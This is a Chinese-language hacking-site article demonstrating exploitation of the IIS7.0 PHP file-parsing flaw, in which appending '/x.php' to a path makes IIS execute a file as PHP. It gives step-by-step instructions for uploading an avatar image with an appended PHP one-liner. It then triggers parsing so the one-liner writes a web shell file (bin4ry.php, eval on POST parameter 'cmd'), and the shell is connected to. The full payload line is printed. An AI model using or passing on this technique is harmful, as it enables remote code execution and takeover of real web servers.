Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

绿色网站无广告
会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

IIS7.0 php 错误文件解析漏洞利用实例演示视频

来源: 未知 分享至:

 

 

IIS7.0 php 错误文件解析漏洞实例演示视频

演示视频下载

得到 www.xxxxxxxxi.com web服务为IIS7.0
 

www.xxxxxxxxi.com/robots.txt后面加上/任意字符.php成功解析为php


注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马


 
<?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?>

 

如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话木马,密码cmd

 
上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php

用一句话木马连接


Tags: 视频 错误 IIS7. 实例 演示
分享至:
最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史